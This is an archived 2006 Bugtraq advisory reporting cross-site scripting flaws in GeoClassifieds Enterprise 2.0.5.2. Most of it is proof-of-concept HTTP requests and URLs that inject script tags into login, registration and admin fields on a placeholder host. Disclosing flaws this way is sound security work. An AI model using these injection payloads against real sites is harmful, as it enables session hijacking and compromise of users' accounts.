| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060727055907.27885.qmail@securityfocus.com> Date: 27 Jul 2006 05:59:07 -0000 From: securityconnection@...il.com To: bugtraq@...urityfocus.com Subject: GeoClassifieds Enterprise <= 2.0.5.2 Cross Site Scripting GeoClassifieds Enterprise 2.0.5.2 http://geodesicsolutions.com/products/classifieds/classifieds_enterprise.htm -------------------------- Cross Site Scripting (XSS) -------------------------- POST http://target.xx:80/index.php?a=10 HTTP/1.0 Host: target.xx Content-Type: application/x-www-form-urlencoded Content-Length: 115 b[username]="><script>alert(/EllipsisSecurityTest/)</script>&b[password]2=1&submit=1 --- POST http://target.xx:80/register.php?b=1 HTTP/1.0 Host: target.xx Content-Type: application/x-www-form-urlencoded Content-Length: 208 c[firstname]=1&c[lastname]=1&c[company_name]=1&c[business_type]=1&c[business_type]=1&c[address]=1&c[address_2]=1&c[city]=1&c[zip]=1&c[phone]="><script>alert(/EllipsisSecurityTest/)</script> --- http://target.xx/index.php?a=11&b=0&c=><script>alert(/EllipsisSecurityTest/)</script>&d=5 http://target.xx/admin/index.php?b[username]="><script>alert(/EllipsisSecurityTest/)</script>&b[password]=1 ----------------- Ellipsis Security http://www.ellsec.org
Powered by blists - more mailing lists